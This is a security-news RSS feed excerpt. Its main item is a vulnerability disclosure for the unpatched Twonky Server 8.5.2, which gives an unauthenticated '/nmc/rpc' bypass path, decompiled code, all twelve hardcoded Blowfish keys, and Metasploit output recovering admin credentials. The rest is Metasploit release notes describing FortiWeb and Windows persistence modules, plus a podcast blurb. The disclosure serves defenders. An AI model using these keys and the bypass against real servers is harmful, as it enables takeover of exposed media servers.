<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/metasploit-adds-exploit-module-for-recently-disclosed-fortiweb-0-day-vulnerabilities/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/metasploit-adds-exploit-module-for-recently-disclosed-fortiweb-0-day-vulnerabilities/">Metasploit Adds Exploit Module for Recently Disclosed FortiWeb 0-Day Vulnerabilities</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 11/21/2025]]></title>
<description><![CDATA[CVE-2025-64446 - Fortinet’s FortiWeb exploitationA critical vulnerability in Fortinet’s FortiWeb Web Application Firewall, now assigned CVE-2025-64446 (CVSS 9.1), allows unauthenticated attackers to gain full administrator access to the FortiWeb Manager interface and its websocket CLI. The flaw b...]]></description>
<link>https://tsecurity.de/de/3113164/it-security-nachrichten/metasploit-wrap-up-11212025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3113164/it-security-nachrichten/metasploit-wrap-up-11212025/</guid>
<pubDate>Fri, 21 Nov 2025 22:19:19 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>CVE-2025-64446 - Fortinet’s FortiWeb exploitation</h2><p>A critical vulnerability in Fortinet’s FortiWeb Web Application Firewall, now assigned CVE-2025-64446 (CVSS 9.1), allows unauthenticated attackers to gain full administrator access to the FortiWeb Manager interface and its websocket CLI. The flaw became publicly known on October 6, 2025, after Defused shared a proof-of-concept exploit captured by their honeypots. Metasploit now has support for an auxiliary module admin/http/fortinet_fortiweb_create_admin which can be used to create a new administrative user, and an upcoming exploit module targeting Fortinet FortiWeb that exploits CVE-2025-64446 and CVE-2025-58034 for an authenticated command injection that allows for root OS command execution. For more details see <a href="https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/">Rapid7’s analysis on CVE-2025-64446</a></p><h2>New module content (3)</h2><h3>Fortinet FortiWeb create new local admin</h3><p>Authors: Defused and sfewer-r7</p><p>Type: Auxiliary Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20698">#20698</a> contributed by <a href="https://github.com/sfewer-r7">sfewer-r7</a></p><p>Path: admin/http/fortinet_fortiweb_create_admin</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-64446&amp;referrer=blog">CVE-2025-64446</a></p><p>Description: Adds a module for the recent FortiWeb 8.0.1 authentication bypass vulnerability allowing an attacker to create a new administrative user. The exploit is based on the PoC published by Defused.</p><h3>Windows Persistent Service Installer</h3><p>Authors: Green-m <a href="mailto:greenm.xxoo@gmail.com">greenm.xxoo@gmail.com</a> and h00die</p><p>Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20638">#20638</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: windows/persistence/service</p><p>Description: Updates the Windows service persistence to use the new mixin, adds the ability to run as either Powershell or sc.exe, and uses more libraries.</p><h3>Windows WSL via Registry Persistence</h3><p>Authors: Joe Helle and h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20701">#20701</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: windows/persistence/wsl/registry</p><p>Description: Adds a new Windows persistence module - the WSL registry module. The module will create registry entries (Run, RunOnce) to run a Linux payload stored in WSL.</p><h2>Enhancements and features (5)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20560">#20560</a> from <a href="https://github.com/cdelafuente-r7">cdelafuente-r7</a> - Adds references to MITRE ATT&amp;CK technique T1021 "Remote Services" and its sub-techniques.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20638">#20638</a> from <a href="https://github.com/h00die">h00die</a> - Updates the windows service persistence to use the new mixin, adds the ability to run as either Powershell or sc.exe, and uses more libraries.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20689">#20689</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Add tests for socket channels in Meterpreter and SSH sessions.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20699">#20699</a> from <a href="https://github.com/sfewer-r7">sfewer-r7</a> - Adds the CVE number and further guidance on vulnerable versions for the vulnerability.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20707">#20707</a> from <a href="https://github.com/bcoles">bcoles</a> - Updates multiple Linux reboot payloads to note that CAP_SYS_BOOT privileges are required.</li></ul><h2>Bugs fixed (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20687">#20687</a> from <a href="https://github.com/dwelch-r7">dwelch-r7</a> - This updates the auxiliary/scanner/winrm/winrm_login module to catch access denied errors when trying to create a shell session. This is then used to inform the operator that the target account's password is correct but they do not have permissions to start a shell with WinRM.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20695">#20695</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Updates the Java and PHP Meterpreter to send the local address and local port information back to Metasploit when opening TCP or UDP sockets on the remote host.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20708">#20708</a> from <a href="https://github.com/cdelafuente-r7">cdelafuente-r7</a> - Fixes a bug with msfdb when attempting to execute the program with bundle exec.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20711">#20711</a> from <a href="https://github.com/bcoles">bcoles</a> - Fixes description for AppendExit datastore option.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20694">#20694</a> from <a href="https://github.com/cgranleese-r7">cgranleese-r7</a> - Adds new documentation on Metasploit's post module support. Additionally adds documentation for the new create_process API that supersedes the legacy cmd_exec API.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Missing rn-* label on Github (4)</h2><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222025-11-12T18%3A54%3A53Z..2025-11-20T17%3A42%3A56Z%22">Pull Requests 6.4.98...6.4.99</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.98...6.4.99">Full diff 6.4.98...6.4.99</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-13315, CVE-2025-13316: Critical Twonky Server Authentication Bypass (NOT FIXED)]]></title>
<description><![CDATA[OverviewTwonky Server version 8.5.2 is susceptible to two vulnerabilities that facilitate administrator authentication bypass on Linux and Windows. An unauthenticated attacker can improperly access a privileged web API endpoint to leak application logs, which contain encrypted administrator crede...]]></description>
<link>https://tsecurity.de/de/3108104/it-security-nachrichten/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3108104/it-security-nachrichten/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/</guid>
<pubDate>Wed, 19 Nov 2025 19:19:48 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Overview</h2><p><a href="https://lynxtechnology.com/twonky-server.html" target="_blank"><span>Twonky Server</span></a><span> version 8.5.2 is susceptible to two vulnerabilities that facilitate administrator authentication bypass on Linux and Windows. An unauthenticated attacker can improperly access a privileged web API endpoint to leak application logs, which contain encrypted administrator credentials (CVE-2025-13315). As a result of the use of hardcoded encryption keys, the attacker can then decrypt these credentials and login as an administrator to Twonky Server (CVE-2025-13316). Exploitation results in the unauthenticated attacker gaining plain text administrator credentials, full administrator access to the Twonky Server instance, and control of all stored media files. These vulnerabilities are tracked as CVE-2025-13315 and CVE-2025-13316.</span></p><p><br><span>These vulnerabilities </span><span><strong>have not been patched</strong></span><span>. Despite making contact with the vendor, and the vendor confirming receipt of our technical disclosure document, the vendor ceased communications after disclosure. They stated that a patch wouldn’t be possible, even with a disclosure timeline extension, and subsequent follow-up attempts on our part were unsuccessful. As such, the vulnerable version 8.5.2 is the latest available.</span></p><h2>Product description</h2><p><a href="https://lynxtechnology.com/twonky-server.html" target="_blank"><span>Twonky Server</span></a><span> is </span><a href="https://en.wikipedia.org/wiki/TwonkyMedia_server" target="_blank"><span>media server software</span></a><span> marketed to both organizations and individuals. It’s generally designed to run on embedded systems, such as NAS devices and routers, for media organization, access, and streaming. At the time of publication, Shodan returns </span><a href="https://www.shodan.io/search?query=twonky+product%3A%22TwonkyMedia+UPnP%22" target="_blank"><span>approximately 850</span></a><span> Twonky Server services exposed to the public internet.</span></p><h2>Credit</h2><p><span>These issues were discovered and reported to Lynx Technology by Ryan Emmons, Staff Security Researcher at Rapid7. The vulnerabilities are being disclosed in accordance with </span><a href="https://www.rapid7.com/security/disclosure/" target="_blank"><span>Rapid7's vulnerability disclosure policy</span></a><span>. This work is based on the previous Twonky Server </span><a href="https://web.archive.org/web/20220311015907/https://www.riskbasedsecurity.com/research/rbs-2021-003-twonky-server/" target="_blank"><span>research published</span></a><span> by Sven Krewitt.</span></p><h2>Vulnerability details</h2><table><tbody><tr><td><p><strong>CVE</strong></p></td><td><p><strong>Description</strong></p></td><td><p><strong>CVSS</strong></p></td></tr><tr><td><p>CVE-2025-13315</p></td><td><p>An unauthenticated remote attacker can bypass web service API authentication controls to leak a log file and read the administrator’s username and encrypted password.</p></td><td><p><a href="https://www.first.org/cvss/calculator/4-0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" target="_blank">9.3 (Critical)</a></p></td></tr><tr><td><p>CVE-2025-13316</p></td><td><p>The application uses hardcoded encryption keys across installations. An attacker with an encrypted administrator password value can decrypt it into plain text using these hardcoded keys.</p></td><td><p><a href="https://www.first.org/cvss/calculator/4-0#CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" target="_blank">8.2 (High)</a></p></td></tr></tbody></table><p></p><p><span>The testing target was Twonky Server 8.5.2, the latest version available at the time of research. Rapid7 identified two security vulnerabilities as part of this research project, which are outlined in the table above. These vulnerabilities were tested against Twonky Server installed on two different operating systems: Ubuntu Linux 22.04.1 and Windows Server 2022. When exploited, these vulnerabilities effectively serve as a patch bypass for the security mitigations introduced in response to the two vulnerabilities </span><a href="https://web.archive.org/web/20220311015907/https://www.riskbasedsecurity.com/research/rbs-2021-003-twonky-server/" target="_self"><span>disclosed</span></a><span> by Risk Based Security in 2021.</span></p><h3>CVE-2025-13315</h3><p><span>In 2021, the security firm Risk Based Security </span><a href="https://web.archive.org/web/20220311015907/https://www.riskbasedsecurity.com/research/rbs-2021-003-twonky-server/" target="_blank"><span>disclosed</span></a><span> an improper API access vulnerability in Twonky Server, for which no CVE is assigned. Their approach was to leak the administrator’s username and obfuscated password via requests to </span><span><span data-type="inlineCode">/rpc/get_option?accessuser</span></span><span> and </span><span><span data-type="inlineCode">/rpc/get_option?accesspwd</span></span><span>, which previously did not enforce authentication checks. In the patch, authentication checks were implemented for the </span><span><span data-type="inlineCode">/rpc</span></span><span> web API. However, some administrator RPC API endpoints, such as </span><span><span data-type="inlineCode">log_getfile</span></span><span>, are still accessible without authentication via alternative routing.</span><br></p><p></p><p></p><pre language="c">00461ddf                                if (!check_path(&amp;arg1[2], "/rpc/info_status"))
00461ddf                                {
00461fc8                                    if (check_path(&amp;arg1[2], "/rpc/stop"))
00461fcf                                        goto label_461de5;
00461fcf                                    
00461fe4                                    if (check_path(&amp;arg1[2], "/rpc/stream_active"))
00461fe4                                        goto label_461de5;
00461fe4                                    
00461ff9                                    if (check_path(&amp;arg1[2], "/rpc/byebye"))
00461ff9                                        goto label_461de5;
00461ff9                                    
0046200e                                    if (check_path(&amp;arg1[2], "/rpc/wakeup"))
0046200e                                        goto label_461de5;
0046200e                                    
00462023                                    if (check_path(&amp;arg1[2], "/rpc/get_option?language"))
00462023                                        goto label_461de5;
00462023                                    
00462043                                    if (check_path(&amp;arg1[2], "/rpc/get_option?multiusersupportenabled")
00462043                                            || !(var_480_1 &amp; 1))
[..SNIP..]
004621af                                            *(uint64_t*)((char*)arg1 + 0x828) = "text/plain; charset=utf-8";
004621af                                            
004621c9                                            if (check_path(&amp;arg1[2], "/rpc/log_getfile"))
004621c9                                            {
004622bf                                                char* rax_59 = getlogfile();</pre><p>⠀</p><p>The decompiled binary contains the string "/nmc/rpc/", which is referenced in various functions containing request routing logic within the codebase.</p><p>⠀</p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0915111c1b32f479/691e076c70d8497fe8557a5d/Twonky1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Twonky1.png" asset-alt="Twonky1.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0915111c1b32f479/691e076c70d8497fe8557a5d/Twonky1.png" data-sys-asset-uid="blt0915111c1b32f479" data-sys-asset-filename="Twonky1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Twonky1.png" sys-style-type="display"></figure><p>⠀</p><p><span>Jumping right into dynamic testing, we observed that some RPC requests with the </span><span><span data-type="inlineCode">/nmc/rpc</span></span><span> prefix succeeded without authentication. </span></p><p><span>An example is depicted below, calling the </span><span><span data-type="inlineCode">log_getfile</span></span><span> web API endpoint with the typical </span><span><span data-type="inlineCode">/rpc</span></span><span> prefix without authenticating.</span></p><p>⠀</p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf1d15e40d5d02559/691e076cb48b451a7b3f89da/Twonky2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Twonky2.png" asset-alt="Twonky2.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf1d15e40d5d02559/691e076cb48b451a7b3f89da/Twonky2.png" data-sys-asset-uid="bltf1d15e40d5d02559" data-sys-asset-filename="Twonky2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Twonky2.png" sys-style-type="display"></figure><p>⠀</p><div><span><p><span>Requesting the same API endpoint with the </span><span><span data-type="inlineCode">/nmc/rpc</span></span><span> prefix instead, the log file is returned without authentication.</span></p><p>⠀</p><p></p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1e2ad48d2ce06d6f/691e076c5eb8053cec7a7072/Twonky3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Twonky3.png" asset-alt="Twonky3.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1e2ad48d2ce06d6f/691e076c5eb8053cec7a7072/Twonky3.png" data-sys-asset-uid="blt1e2ad48d2ce06d6f" data-sys-asset-filename="Twonky3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Twonky3.png" sys-style-type="display"></figure><div><span><p>⠀</p><p><span>During startup, the application will log the </span><span><span data-type="inlineCode">accesspwd</span></span><span> encrypted administrator password.</span></p><p>⠀</p><p></p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb6fe05f31c7fbf8e/691e076c2bfe5b08253edf93/Twonky4.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Twonky4.png" asset-alt="Twonky4.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb6fe05f31c7fbf8e/691e076c2bfe5b08253edf93/Twonky4.png" data-sys-asset-uid="bltb6fe05f31c7fbf8e" data-sys-asset-filename="Twonky4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Twonky4.png" sys-style-type="display"></figure><p></p><p>⠀</p><p><span>It’s also possible to call other authenticated APIs, such as the one to shut down the server, without authentication by leveraging the same </span><span><span data-type="inlineCode">/nmc/rpc</span></span><span> prefix. When paired with CVE-2025-13316, an unauthenticated attacker can leak the administrator’s username and encrypted password, then decrypt the password to bypass authentication and take over the media server.</span></p><h3>CVE-2025-13316</h3><p><span>In 2021, the security firm Risk Based Security </span><a href="https://web.archive.org/web/20220311015907/https://www.riskbasedsecurity.com/research/rbs-2021-003-twonky-server/" target="_blank"><span>disclosed</span></a><span> a weak password obfuscation vulnerability in Twonky Server, for which no CVE is assigned. It appears that, as a remediation strategy, the Blowfish encryption algorithm was introduced in subsequent versions of Twonky Server. The </span><span><span data-type="inlineCode">twonkyserver</span></span><span> compiled executable defines twelve encryption keys.</span></p><p><span></span></p><pre language="c">008c7fe0  char const (* blowfish_constants)[0x11] = data_634d38 {"E8ctd4jZwMbaV587"}
008c7fe8  char const (* data_8c7fe8)[0x11] = data_634d49 {"TGFWfWuW3cw28trN"}
008c7ff0  char const (* data_8c7ff0)[0x11] = data_634d5a {"pgqYY2g9atVpTzjY"}
008c7ff8  char const (* data_8c7ff8)[0x11] = data_634d6b {"KX7q4gmQvWtA8878"}
008c8000  char const (* data_8c8000)[0x11] = data_634d7c {"VJjh7ujyT8R5bR39"}
008c8008  char const (* data_8c8008)[0x11] = data_634d8d {"ZMWkaLp9bKyV6tXv"}
008c8010  char const (* data_8c8010)[0x11] = data_634d9e {"KMLvvq6my7uKkpxf"}
008c8018  char const (* data_8c8018)[0x11] = data_634daf {"jwEkNvuwYCjsDzf5"}
008c8020  char const (* data_8c8020)[0x11] = data_634dc0 {"FukE5DhdsbCjuKay"}
008c8028  char const (* data_8c8028)[0x11] = data_634dd1 {"SpKNj6qYQGjuGMdd"}
008c8030  char const (* data_8c8030)[0x11] = data_634de2 {"qLyXuAHPTF2cPGWj"}
008c8038  char const (* data_8c8038)[0x11] = data_634df3 {"rKz7NBhM3vYg85mg"}</pre><p></p><p>When an administrator password is set, the application uses one of these hardcoded keys as a Blowfish encryption key for the administrator password. After performing the encryption process, the encrypted password value is embedded in a string formatted as <span data-type="inlineCode">||{HEX_INDEX}{HEX_CIPHERTEXT}</span> and subsequently written to the configuration file.</p><p></p><pre language="c">00581260    int32_t enc_passwd(char* arg1, char* arg2, int32_t arg3)
00581260    {
00581260        int32_t result;
00581268        result = !arg3;
00581268        
00581276        if (!(!arg1 | result) &amp;&amp; arg2)
00581276        {
00581289            uint64_t maxlen = (uint64_t)arg3;
0058129d            memset(arg2, 0, maxlen);
005812a5            result = strlen(arg1);
005812a5            
005812ac            if (result)
005812ac            {
005812ae                char rax = *(uint8_t*)arg1;
005812ae                
005812b4                // Checking if password is already encrypted(legacy)
005812b4                if (rax == ':')
005812b4                {
00581374                    if (arg1[1] == ':')
0058138c                        return snprintf(arg2, maxlen, "%s", arg1);
005812b4                }
005812b4                else if (rax == '|' &amp;&amp; arg1[1] == '|')
0058138c                    return snprintf(arg2, maxlen, "%s", arg1);
0058138c                
005812d1                srand(j_sub_597230());  // seed?
005812fc                uint64_t rdx_4 = (uint64_t)(sub_464c10() % 0xc);
005812fe                char* r14_1 = (&amp;blowfish_constants)[rdx_4];
00581316                void var_1088;
00581316                result = maybe_BF_set_key(&amp;var_1088, r14_1, strlen(r14_1));
00581316                
0058131d                if (!result)
0058131d                {
0058133e                    void* rax_9 = maybe_BF_encrypt(&amp;var_1088, arg1);
0058135b                    // String to write to config file in format ||{INDEX}{CIPHERTEXT}
0058135b                    snprintf(arg2, maxlen, "||%X%s", (uint64_t)rdx_4, rax_9);</pre><p><br><span>Since these keys are static across Twonky Server installations and versions, an attacker with knowledge of the encrypted administrator password can trivially decrypt it to plain text and authenticate to Twonky Server as an administrator. The output of a Metasploit module exploit that pairs CVE-2025-13315 and CVE-2025-13316 for authentication bypass is depicted below.</span></p><p><span></span></p><pre language="html">msf auxiliary(gather/twonky_authbypass_logleak) &gt; run
[*] Running module against 192.168.181.129
[*] Confirming the target is vulnerable
[+] The target is Twonky Server v8.5.2
[*] Attempting to leak encrypted password
[+] The target returned the encrypted password and key index: 14ee76270058c6e3c9f8cecaaebed4fc5206a1d2066d4f78, 7
[*] Decrypting password using key: jwEkNvuwYCjsDzf5
[+] Credentials decrypted: USER=admin PASS=R7Password123!!!
[*] Auxiliary module execution completed</pre><h2>Mitigation guidance</h2><p><span>In lieu of any patches or mitigation guidance from the vendor, affected organizations and individuals are advised to restrict Twonky Server traffic to only trusted IPs. Additionally, any administrator credentials configured in Twonky Server should be assumed to be compromised.</span></p><h2>Rapid7 customers</h2><p><span>Exposure Command, InsightVM and Nexpose customers will be able to assess their exposure to CVE-2025-13315 and CVE-2025-13316 with unauthenticated vulnerability checks expected to be available in today’s (November 19) content release.</span></p><h2>Disclosure timeline</h2><p><span><strong>August 5, 2025:</strong></span><span> Rapid7 reaches out to a Lynx Technology contact email address.</span></p><p><span><strong>August 6, 2025:</strong></span><span> A Lynx Technology representative replies and confirms that the address is the proper path to disclose vulnerabilities.</span></p><p><span><strong>August 12, 2025:</strong></span><span> Rapid7 shares the disclosure document with technical details and a proof-of-concept exploit.</span></p><p><span><strong>August 18, 2025:</strong></span><span> Lynx Technology confirms that the document has been received and shared with management.</span></p><p><span><strong>September 3, 2025:</strong></span><span> Rapid7 follows up and requests a ~60-day disclosure date of October 13.</span></p><p><span><strong>September 5, 2025:</strong></span><span> Lynx Technology replies and acknowledges the 60-day timeline as standard practice, but states that resource constraints prevent a patch from being issued on that timeline.</span></p><p><span><strong>September 9, 2025:</strong></span><span> Rapid7 replies and offers to accommodate beyond the standard 60-day timeline with a ~90-day timeline, the week of November 17, 2025.</span></p><p><span><strong>September 30, 2025:</strong></span><span> Rapid7 follows up in the same ticket thread and reiterates the offer to extend to a 90-day timeline.</span></p><p><span><strong>October 28, 2025:</strong></span><span> Rapid7 opens a new ticket and reiterates the offer to extend the timeline.</span></p><p><span><strong>November 13, 2025:</strong></span><span> Rapid7 follows up and reiterates the intent to publish materials in November. </span></p><p><span><strong>November 14, 2025:</strong></span><span> Rapid7 follows up and reiterates the upcoming publication, with no response.</span></p><p><strong>November 19, 2025:</strong> This disclosure.</p></span></div></span></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[114: HD]]></title>
<description><![CDATA[HD Moore (https://twitter.com/hdmoore) invented a hacking tool called Metasploit. He crammed it with tons of exploits and payloads that can be used to hack into computers. What could possibly go wrong? Learn more about what HD does today by visiting rumble.run/.SponsorsSupport for this show comes...]]></description>
<link>https://tsecurity.de/de/3105948/podcasts/114-hd/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3105948/podcasts/114-hd/</guid>
<pubDate>Wed, 19 Nov 2025 00:36:40 +0100</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>HD Moore (https://twitter.com/hdmoore) invented a hacking tool called Metasploit. He crammed it with tons of exploits and payloads that can be used to hack into computers. What could possibly go wrong? Learn more about what HD does today by visiting rumble.run/.</p><p><br></p><p>Sponsors</p><p>Support for this show comes from Quorum Cyber. They exist to defend organisations against cyber security breaches and attacks. That’s it. No noise. No hard sell. If you’re looking for a partner to help you reduce risk and defend against the threats that are targeting your business — and specially if you are interested in Microsoft Security - reach out to www.quorumcyber.com.</p><p><br></p><p>Support for this show comes from Snyk. Snyk is a developer security platform that helps you secure your applications from the start. It automatically scans your code, dependencies, containers, and cloud infrastructure configs — finding and fixing vulnerabilities in real time. And Snyk does it all right from the existing tools and workflows you already use. IDEs, CLI, repos, pipelines, Docker Hub, and more — so your work isn’t interrupted. Create your free account at snyk.co/darknet.</p><p> </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 11/14/2025]]></title>
<description><![CDATA[It has “SUS” in the name, what did you expect?This week’s release features the much-hyped CVE-2025-59287, a Critical-Severity Windows Server Update Service (WSUS) vulnerability that allows for SYSTEM level remote code execution. Documented among the multiple recent zero-days in Windows, the vulne...]]></description>
<link>https://tsecurity.de/de/3099277/it-security-nachrichten/metasploit-wrap-up-11142025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3099277/it-security-nachrichten/metasploit-wrap-up-11142025/</guid>
<pubDate>Fri, 14 Nov 2025 22:34:43 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="235" max-width="235" height="195" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA5EAAALcCAYAAAB+YzS5AAAQAElEQVR4Aez9B4AkWX3lC58bEWnKV7Xv8TPMDG6wg0d49wCBBAgJSYsQQhJCeARCSCCvBaRdaXf1dvdbv/vtvtU+eS+8h5lhvOnp7pme7jHtXXmTNt7/RHX2VFeXSRORGZl5qvNWREZc87+/G5UdJ0/EDQ9AqCQGOgZ0DOgY0DGgY0DHgI4BHQM6BnQM6BjQMVDPMUARafn06j4CilgEREAEREAEREAEREAEREAE2k9AIrL9zNVivxNQ/0VABERABERABERABESgiwlIRHbx4Cl0ERCB9hJQayIgAiIgAiIgAiIgAoBEpI4CERABERCBXieg/omACIiACIiACMRIQCIyRpiqSgREQAREQAREIE4CqksEREAERCCNBCQi0zgqikkEREAEREAEREAEupmAYhcBEehpAhKRPT286pwIiIAIiIAIiIAIiIAI1E9AOUWgHgISkfVQUh4REAEREAEREAEREAEREAERSC+BtkYmEdlW3GpMBERABERABERABERABERABLqbgERknOOnukRABERABERABERABERABESgxwlIRPb4AKt79RFQLhEQAREQAREQAREQAREQgfoISETWx0m5REAE0klAUYmACIiACIiACIiACLSZgERkm4GrOREQAREQARJQEgEREAEREAER6FYCEpHdOnKKWwREQAREQAQ6QUBtioAIiIAI9D0Bici+PwQEQAREQAREQAREoB8IqI8iIAIiEBcBici4SKoeERABERABERABERABEYifgGoUgdQRkIhM3ZAoIBEQAREQAREQAREQAREQge4n0Ls9kIjs3bFVz0RABERABERABERABERABEQgdgI9LyJjJ6YKRUAEREAEREAEREAEREAERKCPCUhE9vHgp7zrCk8EREAEREAEREAEREAERCCFBCQiUzgoCkkEupuAohcBERABERABERABEehlAhKRvTy66psIiIAINEJAeUVABERABERABESgDgISkXVAUhYREAEREAERSDMBxSYCIiACIiAC7SQgEdlO2mpLBERABERABERABB4noDUREAER6EoCEpFdOWwKWgREQAREQAREQAREoHME1LII9DcBicj+Hn/1XgREQAREQAREQAREQAT6h4B6GgsBichYMKoSERABERABERABERABERABEegPAp0Qkf1BVr0UAREQAREQAREQAREQAREQgR4kIBHZg4OaXJdUswiIgAiIgAiIgAiIgAiIQL8TkIjs9yNA/e8PAuqlCIiACIiACIiACIiACMREQCIyJpCqRgREQASSIKA6RUAEREAEREAERCBtBCQi0zYiikcEREAERKAXCKgPIiACIiACItCzBCQie3Zo1TEREAEREAEREIHGCaiECIiACIjAZgQkIjcjpP0iIAIiIAIiIAIiIALpJ6AIRUAE2kZAIrJtqNWQCIiACIiACIiACIiACIjAagJ6330EJCK7b8wUsQiIgAiIgAiIgAiIgAiIgAh0jMA5Edmx9tWwCIiACIiACIiACIiACIiACIhAFxGQiOyiwVozVG0UAREQAREQAREQAREQAREQgTYSkIhsI2w1JQIrCWhdBERABERABERABERABLqRgERkN46aYhYBEegkAbUtAiIgAiIgAiIgAn1NQCKyr4dfnRcBERCBfiKgvoqACIiACIiACMRBQCIyDoqqQwREQAREQAREIDkCqlkEREAERCBVBCQiUzUcCkYEREAEREAEREAEeoeAeiICItCbBCQie3Nc1SsREAEREAEREAEREAERaJaAyonAhgQkIjfEo50iIAIiIAIiIAIiIAIiIAIi0C0E2hOnRGR7OKsVERABERABERABERABERABEegJAhKRCQyjqhQBERABERABERABERABERCBXiUgEdmrI6t+NUNAZURABERABERABERABERABDYhIBG5CSDtFgER6AYCilEEREAEREAEREAERKBdBCQi20Va7YiACIiACFxMQFtEQAREQAREQAS6joBEZNcNmQIWAREQAREQgc4TUAQiIAIiIAL9S0Aisn/HXj0XAREQAREQARHoPwLqsQiIgAi0TEAismWEqkAEREAEREAEREAEREAEkiag+kUgPQQkItMzFopEBERABERABERABERABESg1wj0YH8kIntwUNUlERABERABERABERABERABEUiKQL+IyKT4qV4REAEREAEREAEREAEREAER6CsCEpF9Ndzd2FnFLAIiIAIiIAIiIAIiIAIikCYCEpFpGg3FIgK9REB9EQEREAEREAEREAER6EkCEpE9OazqlAiIgAg0T0AlRUAEREAEREAERGAjAhKRG9HRPhEQAREQARHoHgKKVAREQAREQATaQkAisi2Y1YgIiIAIiIAIiIAIrEdA20VABESguwhIRHbXeClaERABERABERABERCBtBBQHCLQpwQkIvt04NVtERABERABERABERABEehXAup3awQkIlvjp9IiIAIiIAIiIAIiIAIiIAIi0FcEOigi+4qzOisCIiACIiACIiACIiACIiACPUFAIrInhrHNnVBzIiACIiACIiACIiACIiACfUtAIrJvh14d70cC6rMIiIAIiIAIiIAIiIAItEpAIrJVgiovAiIgAskTUAsiIAIiIAIiIAIikBoCEpGpGQoFIgIiIAIi0HsE1CMREAEREAER6D0CEpG9N6bqkQiIgAiIgAiIQKsEVF4EREAERGBdAhKR66LRDhEQAREQAREQAREQgW4joHhFQASSJyARmTxjtSACIiACIiACIiACIiACIrAxAe3tIgISkV00WApVBERABERABERABERABERABDpN4EIR2elo1L4IiIAIiIAIiIAIiIAIiIAIiECqCUhEpnp46g9OOUVABERABERABERABERABESgHQQkIttBWW2IwPoEtEcEREAEREAEREAEREAEuoqARGRXDZeCFQERSA8BRSICIiACIiACIiAC/UlAIrI/x129FgEREIH+JaCei4AIiIAIiIAItERAIrIlfCosAiIgAiIgAiLQLgJqRwREQ